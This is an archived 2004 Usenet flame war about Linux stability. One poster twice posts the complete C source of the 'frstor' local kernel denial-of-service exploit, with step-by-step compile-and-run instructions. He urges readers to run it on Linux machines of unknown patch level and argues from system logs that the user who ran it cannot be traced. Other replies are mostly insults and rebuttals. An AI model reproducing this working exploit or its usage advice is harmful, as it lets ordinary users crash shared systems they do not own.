|
Home > Archive > Linux Advocacy > June 2004 > Okay, tell me agin how bullet proof and rouust Linux is....
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
Okay, tell me agin how bullet proof and rouust Linux is....
|
|
| T.G.Reaper 2004-06-26, 12:26 pm |
|
[ 16:45:32] Linux Kernel Crash $ ls -ls
total 40
20 -rw------- 1 Reaper users 16900 Jun 16 16:56 2004-06-11_kernel_crash.t2t.tar.bz2
8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
[ 16:45:35] Linux Kernel Crash $
[ 16:45:52] Linux Kernel Crash $ su root
Password:
[ 16:46:14] Linux Kernel Crash $ whoami
root
[ 16:46:23] Linux Kernel Crash $ uname -a
Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
[ 16:46:35] Linux Kernel Crash $
[ 16:46:38] Linux Kernel Crash $ emerge -u system
Calculating system dependencies ...done![vbcol=seagreen]
[vbcol=seagreen]
* GNU info directory index is up-to-date.
[ 16:46:57] Linux Kernel Crash $ exit
exit
[ 16:47:27] Linux Kernel Crash $ whoami
Reaper
[ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
__________________________________
Guess what happens if I actually hit return and execute that little
program. I'll tell you what happen the entire machine LOCKS UP HARD, no
mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
zilch, nothing at all is usable.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
No entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Hacking Coff 2004-06-26, 12:26 pm |
| T.G.Reaper wrote:
> [snip]
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
Reaper's achieved the dream. He's ported one of the most distinguishable
features of Windows to Linux, preserving the Microsoft standard in every
way. Bravo!
Wonder if this'll help the average user feel more comfortable with Linux.
--
AND REDMOND'S STREETS SHALL FLOW RED WITH THE BLOOD OF THE BUTTERFLY!
..sig FILE! .sig FILE!
| |
| Sinister Midget 2004-06-26, 12:27 pm |
| On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
> T.G.Reaper wrote:
>
> Reaper's achieved the dream. He's ported one of the most distinguishable
> features of Windows to Linux, preserving the Microsoft standard in every
> way. Bravo!
>
> Wonder if this'll help the average user feel more comfortable with Linux.
I feel another Teegee Super-Duper Linux Exploit(tm) coming on. I hope
this time he spells out exactly what's needed to make it work so we
don't have to spend days trying to pin down what is needed to make it
operate properly on any particular machine. Like last time.
It had to gawdawful embarrassing to have to solicit help from the
owners/operators of every participating machine to simply let him 0wN
them.
--
Linux: Because life is too short to spend it rebooting.
| |
| Buford 2004-06-26, 12:27 pm |
| On Sun, 20 Jun 2004 01:53:59 +0000, Sinister Midget wrote:
> On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
>
> I feel another Teegee Super-Duper Linux Exploit(tm) coming on. I hope this
> time he spells out exactly what's needed to make it work so we don't have
> to spend days trying to pin down what is needed to make it operate
> properly on any particular machine. Like last time.
>
> It had to gawdawful embarrassing to have to solicit help from the
> owners/operators of every participating machine to simply let him 0wN
> them.
Hey, was he the guy who wrote (or possibly found) this super-dooper Linux
exploit, and everybody in COLA was trying to get it to run on their
machines to see what it would do, and it kept failing and crashing, and
T.G. Reaper kept trying to get people to do different things to make it
work so he could 0wN their machines?
I remember that. That was pretty funny.
--
Buford
o. "I'm doing a free operating system (just a hobby, won't be
..o big and professional like gnu)..."
ooo - Linus Torvalds, 1991
| |
| T.G.Reaper 2004-06-26, 12:27 pm |
| On Sun, 20 Jun 2004 01:53:59 +0000, Sinister Midget wrote:
> On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
[vbcol=seagreen]
> I feel another Teegee Super-Duper Linux Exploit(tm) coming on.
As you wish, this time I'm being lazy, here's the source code, you have to
be smart enough to compile and run it yourself.
If that's too hard for some people, maybe I'll post the executable on my
website so that anybody who wants to, can have the opportunity to crash a
random Linux box.
>I hope
> this time he spells out exactly what's needed to make it work
Okay:
Step 1. Cppy and paste the below source code: evil.c into the text
editor of your choice and save it to a file named "evil.c."
From a command line in the directory you saved the above file in:
Step 2. $ gcc -o whatevernameyouwant evil.c
Step 3. $ chmod a+x whatevernameyouwant
Step 4. $ ./whatevernameyouwant
Is that too difficult for you?
If it is, like I said I can post the binary if you wish, of course
maybe changing an execute bit is too difficult for a regular Linux
user to accomplish, and there's really no problem.
BTW, just so you will get a realistic sense of how serious the problem is,
try running it on a system that is patched and up to date as of
say, a week ago, you know, like most of the systems around the
world probably are.
/* ---- begin file: evil.c ---------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// -------- end file evil.c ---------
Out of the millions of Linux systems there are around the world, what
percentage of them do you think are probably vulnerable to being
killed by *any* single user who has local or remote shell access
right now? Pretty scary shit.
On my humble little Gentoo system here, I've updated everything I can
possibly update with the most current patches available. Even so,
the few meager lines of code shown above easily sent my Linux box into la
la land.
--
Linux security....is that some kind of swiss cheese?
Cheers, T.G. Reaper
| |
| T.G.Reaper 2004-06-26, 12:27 pm |
| On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
> I remember that. That was pretty funny.
Here sport, compile and run this on a few Linux boxes that you don't know
how up to date the patches are, then come back and tell me how funny you
think those results are.
* ---- begin file: evil.c ---------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// -------- end file evil.c ---------
--
Cheers
T.G. Reaper
| |
| T.G.Reaper's IQ is 35 2004-06-26, 12:27 pm |
| T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
>
>
> Here sport, compile and run this
BWAAAHAAAHAAAHAAAHAAHAAAHAA!
T.G.Reaper's volunteer virus:
"Please, please, please compile and run this! Here are the
instructions on how to make your system crash with only
about 5 minutes of work and persistence ..."
| |
| GreyCloud 2004-06-26, 12:27 pm |
|
T.G.Reaper wrote:
> [ 16:45:32] Linux Kernel Crash $ ls -ls
> total 40
> 20 -rw------- 1 Reaper users 16900 Jun 16 16:56 2004-06-11_kernel_crash.t2t.tar.bz2
> 8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
> 4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
> 4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
> 4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
> [ 16:45:35] Linux Kernel Crash $
> [ 16:45:52] Linux Kernel Crash $ su root
> Password:
> [ 16:46:14] Linux Kernel Crash $ whoami
> root
> [ 16:46:23] Linux Kernel Crash $ uname -a
> Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
> [ 16:46:35] Linux Kernel Crash $
> [ 16:46:38] Linux Kernel Crash $ emerge -u system
> Calculating system dependencies ...done!
>
>
>
>
>
> * GNU info directory index is up-to-date.
>
> [ 16:46:57] Linux Kernel Crash $ exit
> exit
> [ 16:47:27] Linux Kernel Crash $ whoami
> Reaper
> [ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
>
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
Uh, what program is that?
| |
| GreyCloud 2004-06-26, 12:27 pm |
|
T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
>
>
>
>
> Here sport, compile and run this on a few Linux boxes that you don't know
> how up to date the patches are, then come back and tell me how funny you
> think those results are.
>
> * ---- begin file: evil.c ---------
> * frstor Local Kernel exploit
> * Crashes any kernel from 2.4.18
> * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
> * Original proof of concept code
> * by stian_@_nixia.no.
> * Added some stuff by lorenzo_@_gnu.org
> * and fixed the fsave line with (*fpubuf).
> * --------------------
> */
>
> /*
> ---------
> Some debugging information made
> available by stian_@_nixia.no
> ---------
> TakeDown:
> pushl %ebp
> movl %esp, %ebp
> subl $136, %esp
> leal -120(%ebp), %eax
> movl %eax, -124(%ebp)
> #APP
> fsave -124(%ebp)
>
> #NO_APP
> subl $4, %esp
> pushl $1
> pushl $.LC0
> pushl $2
> call write
> addl $16, %esp
> leal -120(%ebp), %eax
> movl %eax, -128(%ebp)
> #APP
> frstor -128(%ebp)
>
> #NO_APP
> leave
> ret
> */
>
> #include <sys/time.h>
> #include <signal.h>
> #include <unistd.h>
>
> static void TakeDown(int ignore)
> {
> char fpubuf[108];
> // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
> __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
> write(2, "*", 1);
> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> }
>
> int main(int argc, char *argv[])
> {
> struct itimerval spec;
> signal(SIGALRM, TakeDown);
> spec.it_interval.tv_sec=0;
> spec.it_interval.tv_usec=100;
> spec.it_value.tv_sec=0;
> spec.it_value.tv_usec=100;
> setitimer(ITIMER_REAL, &spec, NULL);
> while(1)
> write(1, ".", 1);
>
> return 0;
> }
>
> // -------- end file evil.c ---------
>
Oh, c'mon. You can do the same thing to XP. It's the incoming stuff
off the internet that won't work on Linux. Easier done that said on XP tho.
| |
| T.G.Reaper's IQ is 35 2004-06-26, 12:27 pm |
| GreyCloud wrote:
> T.G.Reaper wrote:
>
>
> Oh, c'mon. You can do the same thing to XP.
That particular exploit was noted and fixed. It does absolutely
nothing on my box.
In T.G.Reaper's fantasy world, he sees a global brainwash situation
where ever Linux user is somehow convinced to download, compile,
and run that code if the user can manage to get root access to the
local PC, thus taking down the Internet.
Is there really any question about his obtuseness?
| |
| William Poaster 2004-06-26, 12:27 pm |
| begin On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget posted:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
<snip>
[vbcol=seagreen]
> No, not too difficult. But it still requires me to:
>
> a. compile it.
>
> b. make it executable.
>
> c. run it (probably going to need root access to get the desired result).
>
> d. become 0w43D.
It's amazing to me, that these yo-yo's *still* don't realise the hoops you
have to jump through to be 0wn3d. They seem to think that other OS's
behave *just* the same way as Gateware. Sad, really....
> Why can't we just have something posted to usenet, or maybe emailed, or
> stuck on a web page someplace, so we can be 'sploited? You know, like
> Billy Butt-crust has done for the Winders people?
>
> Still, the requirements _might_ be a little less stringent this time.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
> Oh, c'mon. You can do the same thing to XP.
Okay, feel free to post the XP equivalent.
> It's the incoming stuff
> off the internet that won't work on Linux.
Well, that kinda depends on what comes in and how doesn't it?
For example, if an average user had shell access to a Linux box, say at
his/her ISP, and logged in from the Net. It would be quite trivial for
that user to manage to execute this little app. That's going to kill the
Linux box dead.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:19 pm |
| T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
>
>
> Okay, feel free to post the XP equivalent.
>
>
> Well, that kinda depends on what comes in and how doesn't it?
>
> For example, if an average user had shell access to a Linux box, say at
> his/her ISP, and logged in from the Net. It would be quite trivial for
> that user to manage to execute this little app. That's going to kill the
> Linux box dead.
>
Sure. You are aware that this is already patched, are you?
And, just to stay with your "example", this will also kill the user account.
Because afterwards the admin will install the patch, then take a look which
user did it and kick him off the machine for good.
Now tell us again that any user will do that
Idiot
--
No matter what the anticipated result, there will always be
someone eager to (a) misinterpret it, (b) fake it, or (c) believe
it happened according to his own pet theory.
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sun, 20 Jun 2004 04:50:11 +0000, T.G.Reaper's wrote:
> GreyCloud wrote:
>
> That particular exploit was noted and fixed. It does absolutely
> nothing on my box.
Well then hell, if your system is already patched then there must not be
any problem. Who the XXXX cares about the thousands, if not millions of
Linux systems worldwide that are vulnerable right now. A system
could still be vulnerable because either a patch isn't available yet (my
case), or no one has actually applied the existing patch to the system.
BTW, I've been told that Linux machines don't need to be rebooted just to
do simple things like apply patches and updates.
Is that true in this case?
> In T.G.Reaper's fantasy world, he sees a global brainwash situation
> where ever Linux user is somehow convinced to download, compile,
> and run that code ...
You are aware that an unpatched Linux box could easily be killed by a
normal user with nothing more than simple remote shell access aren't you?
Now let's see, of all the Linux systems world wide, how many do you think
have some type of remote access enabled?
> Is there really any question about his obtuseness?
At least I don't have to nymshift to avoid people's kill files.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget wrote:
>
> No, not too difficult. But it still requires me to:
>
> a. compile it.
> b. make it executable.
> c. run it (probably going to need root access to get the desired
> result).
> d. become 0w43D.
It's not about being 0w43D, it's about literally killing the system deader
than a doornail, from a regular user account.
> Why can't we just have something posted to usenet, or maybe emailed, or
> stuck on a web page someplace, so we can be 'sploited? You know, like
> Billy Butt-crust has done for the Winders people?
Okay, you want it to be easy, just give me a shell account as a regular
user on any unpatched system you have, is that easy enough?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
> It's amazing to me, that these yo-yo's *still* don't realise the hoops you
> have to jump through to be 0wn3d. They seem to think that other OS's
> behave *just* the same way as Gateware. Sad, really....
Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
me a shell account, as just a regular user on any Linux system you have
which currently has a week or more of uptime?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 15:01:17 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
> Sure. You are aware that this is already patched, are you?
Not on my Gentoo box it's not.
> And, just to stay with your "example", this will also kill the user account.
WTF cares, the system is D.E.A.D at that point, it's doing nothing except
staring at it's naval. You can't even reboot it remotely.
Can you say Denial of Service...?
> Because afterwards the admin will install the patch, then take a look which
> user did it and kick him off the machine for good.
BFD, the system is still out of service until a real human being
physically goes to the location of the system, reboots it, and applies
the patch. Assuming a patch exists, one doesn't yet for my Gentoo 2.6
kernel.
> Now tell us again that any user will do that
Yeah right, nobody ever does anything bad to a Linux system because they
might get caught...what a moron.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
< snip >
>
> Yeah right, nobody ever does anything bad to a Linux system because they
> might get caught...what a moron.
>
Not "might". *Will* get caught. Since that user can't remove the evidence
any more (system dead) all remains clear to be seen.
In a corporate network, it will mean getting kicked off the payroll also
With an ISP, it can mean paying damages
Tell us again any user will do it
Idiot (you might be dumb enough to do it)
--
Only two things are infinite,
the Universe and Stupidity.
And I'm not quite sure about the former.
- Albert Einstein
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 15:58:07 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> < snip >
>
>
> Not "might". *Will* get caught. Since that user can't remove the evidence
> any more (system dead) all remains clear to be seen.
> In a corporate network, it will mean getting kicked off the payroll also
> With an ISP, it can mean paying damages
Okay, I've run the exploit code three times on this Gentoo Linux box.
Tell me what logs to look at for the proof that user "Reaper" caused the
system to hang hard?
_____________
Here is the system log across one of the reboots:
Jun 19 19:51:00 SniFF CRON[7541]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:52:00 SniFF CRON[7552]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:53:00 SniFF CRON[7570]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:54:00 SniFF CRON[7587]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:55:00 SniFF CRON[7600]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:56:00 SniFF CRON[7614]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:58:46 SniFF syslog-ng[5155]: syslog-ng version 1.6.0rc3 starting
Jun 19 19:58:46 SniFF syslog-ng[5155]: Changing permissions on special file /dev/tty12
Jun 19 19:58:46 SniFF Linux version 2.6.5-Gentoo (root@SniFF) (gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7)) #2 Tue Apr 20 03:09:39 PDT 2004
Jun 19 19:58:46 SniFF BIOS-provided physical RAM map:
Jun 19 19:58:46 SniFF BIOS-e820: 0000000000000000 - 000000000009f800 (usable)
Jun 19 19:58:46 SniFF BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved)
____________
I don't see anything at all that indicates in anyway that user "Reaper"
caused any type of problem at all. Where is this "proof" that the Admin
would use to kick me off the payroll, or make me pay damages?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 06:05:21 -0700, T.G.Reaper wrote:
> On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
>
>
>
> Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
> me a shell account, as just a regular user on any Linux system you have
> which currently has a week or more of uptime?
Nah, let's compare equivalents. Since those Windows systems which are
getting exploited *aren't*, on the whole, giving out remote shell
accounts, you get the same accommodations. No accounts, but do feel free
to exploit the box anyhow.
You see, if you can't do that, then all that's required to render a Linux
box absolutely secure against remote exploits is to disable remote logins,
which would be a very bad blow for Windows in any comparison of security.
While we're at it, let's also try it the other way: you open up your
Windows box to remote logins, give us the account information and we'll
see which box survives the longer: the Linux box with remote logins, or
the Windows box with remote logins. Oh, but wait... your little exploit
just locks up the box, it doesn't, say, give the user admin privileges
which they can use to access private information, etc, right? So there's
no "0wn3d" involved here at all, really - just frozen.
| |
| Sinister Midget 2004-06-26, 1:20 pm |
| On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget wrote:
>
>
>
> It's not about being 0w43D, it's about literally killing the system deader
> than a doornail, from a regular user account.
>
>
> Okay, you want it to be easy, just give me a shell account as a regular
> user on any unpatched system you have, is that easy enough?
You mean so I can _delegate_ steps a-d? It _still_ requires me to
cooperate or you don't get to do it.
It's not just about being "easy", it's about being "just as easy",
which is the claim made over and over and over wrt how linux is going
to be just as in-trouble as Windoze. As enough people use it, that is.
We linux users should be quaking, we're told, because very, very soon
we're going to be noticed by all of those bad guys who are now
targetting the poor innocent, unbuggy, stable, better-because-there's-
a-company-with-a-name-attached Windoze, and start going after all of
the linux machines on earth when the numbers get high enough to warrant
the bother. If it's going to happen, you and others are going to hve to
pull it off without asking us to do the work for you, or allowing you
into our machines to do it on yur own.
----------------------------------------------------------------
Dear Mr/Mrs/Ms computer user,
Attached is a patch for a very dangerous problem you have on your
linux machine. I have been authorized by Mr. Linux Turvulds to send
this patch along to make sure you are safe. We don't want to be like
the WinDoze people, infecting a lot of other linux machines all over
the internet, now do we?
I need your cooperation with fixing this horrendous bug, though.
Would you please compile the patch, make it executable, then run it?
This is very important! Mr. Linnus Torvulds said you should do this
without delay!
I understand some of the above might be a bit daunting for some of
you. So I have been authorized by Linis to be even more helpful. If
you don't understand fully the steps needed to get this patch
installed, we can do this another way. Please open a shell account
for me to access your machine so I can install it myself. Make the
unsername "abuser" without quotes. I know that looks like a trick by
using that name, but we need to keep the bad guys off-guard, and they
would never suspect a friendly linux user to use a name like that.
Once you create the account, make the password "0wn3d" without
quotes. Remember, to keep passwords secure it's best to mix letters
and numbers. If you'd like to take extra security precations, you can
create a different one, ROT-13 the password and email it back to me.
Evil people don't use ROT-13, so they will never guess that this is
what you've done and they won't know how to get into your machine.
Once this patch has been applied, you will know. More importantly,
though, you will have made yourself safer, and enhanced the security
of the free world dramatically.
I thank you, Mr. Linuss Trovolds thanks you. All of your fellow linux
users thank you.
A linux-using friend
---------------------------------------------------------------
--
SirCam - Innovative Microsoft peer-to-peer software.
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| [snips]
On Sun, 20 Jun 2004 05:56:47 -0700, T.G.Reaper wrote:
>
> Well then hell, if your system is already patched then there must not be
> any problem. Who the XXXX cares about the thousands, if not millions of
> Linux systems worldwide that are vulnerable right now.
Probably nowhere near "millions", given how easy it is to update Linux
boxes.
> BTW, I've been told that Linux machines don't need to be rebooted just to
> do simple things like apply patches and updates.
Non-kernel patches, sure.
> Is that true in this case?
It's a _kernel_ patch, isn't it?
> You are aware that an unpatched Linux box could easily be killed by a
> normal user with nothing more than simple remote shell access aren't you?
"killed" is one thing. Security breaches are another.
> Now let's see, of all the Linux systems world wide, how many do you
> think have some type of remote access enabled?
Loads of 'em. Of those, how many is an arbitrary hacker going to have
shell access on? Of those, how many are going to be vulnerable to said
issue?
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
>
> At least I don't have to nymshift to avoid people's kill files.
BWAAAHAAAHAAAHAAHAAAA!!! You lying sack of shit.
Can't you even lie consistently, you obtuse snotXXXX?
You apparently PLONKed this nym four times already
since yesterday.
-------------------------------------------
Subject: Re: T.G.Reaper - lying sack of shit exposed
Message-ID: <pan.2e839456004.06.20.02.05.55.769547@127.0.0.1.Com>
Date: Sun, 20 Jun 2004 02:24:20 GMT
T.G.Reaper wrote:
> a cola poster made some disparaging comment about her
Ahem:
http://groups.google.com/groups?q=t....0.1.Com&rnum=1
--- quote ---
P.S. I have verifiable proof of a 131 IQ and my wife's is 136. Maybe it
was your own score you were thinking about.
--- end quote ---
http://groups.google.com/groups?q=t....0.1.Com&rnum=3
--- quote ---
> Your wife couldn't
> possibly have an IQ of 136 and still be with you unless she's your
> mental healthcare nurse nurturing your delusion to prevent you
> from descending further into mental illness"
My wife currently has breast cancer and I'd much prefer that you leave her
out of the discussion.
--- end quote ---
You brought her onto Usenet and no "disparaging comments" were ever made
about her, you obtuse, lying sack of shit. Your motive was clearly sympathy
to fend off the attacks on your poor intellect.
| |
|
| T.G.Reaper wrote:
> [SNIP]
That's nice, TG. But, guess what? Since I don't write code and have no
need for gcc, it's not installed on my system. That means
a) I can't compile your program, and
b) Since I can't compile it, I can't run it.
Now, next time you're going to have to make sure it's in an executable form
for those of us with no programming languages installed.
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
< snip TeeGee garbage >
> I don't see anything at all that indicates in anyway that user "Reaper"
> caused any type of problem at all. Where is this "proof" that the Admin
> would use to kick me off the payroll, or make me pay damages?
>
That *you* don't see anything means absolutely zilch.
And, BTW, do your own homework. *You* are the one claiming all sorts of
bullshit. So now you claim, in addition to your other stupidities, that you
are too stupid to find traces. Yup, I can believe that
--
Only two things are infinite,
the Universe and Stupidity.
And I'm not quite sure about the former.
- Albert Einstein
| |
| GreyCloud 2004-06-26, 1:20 pm |
|
T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
>
>
>
>
> Okay, feel free to post the XP equivalent.
>
>
Someone already did. It had to do with printing the '\b' character
several times. A whole lot simpler than the other one you posted.
Programming code to deliberately crash an o/s is a bit different than an
application designed to do real work and crashing the o/s are two
different colors of horse. I've seen where OE had caused XP to
mysteriously reboot a Toshiba laptop. I haven't seen this happen on
Linux/Solaris or OS X.
>
>
> Well, that kinda depends on what comes in and how doesn't it?
>
> For example, if an average user had shell access to a Linux box, say at
> his/her ISP, and logged in from the Net. It would be quite trivial for
> that user to manage to execute this little app. That's going to kill the
> Linux box dead.
Maybe, maybe not. But I'm not talking about this not so normal
situation. I'm talking about surfing the net and reading your email on
your home computer.
| |
| GreyCloud 2004-06-26, 1:20 pm |
|
T.G.Reaper wrote:
> On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
>
>
>
>
>
> Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
> me a shell account, as just a regular user on any Linux system you have
> which currently has a week or more of uptime?
>
Actually, an offer like this exists now at DEFCON 12 being held in Las
Vegas, NV. on July 31, 2004 to Aug. 1, 2004. A Linux box will be there
for various hackers to hack. They didn't even want an Alpha box with
OpenVMS on it as they know that the hackers won't get in and is no fun.
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
